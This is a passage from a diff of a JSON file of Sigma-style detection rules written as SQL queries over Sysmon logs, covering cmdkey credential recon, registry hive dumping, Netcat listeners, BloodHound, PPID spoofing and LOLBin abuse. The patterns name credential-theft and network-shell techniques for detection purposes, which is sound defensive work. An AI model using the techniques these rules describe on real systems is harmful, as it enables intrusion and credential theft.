rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", "attack.t1574.002" @@ -14675,1929 +14350,1873 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_renamed_vmnat.yml" - }, - { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious renamed SysInternals DebugView execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Curl.EXE Execution", + "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "status": "test", + "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1105" ], "falsepositives": [ - "Legitimate ncat use" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_curl_execution.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Very Possible" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Legitimate use of Msra.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' 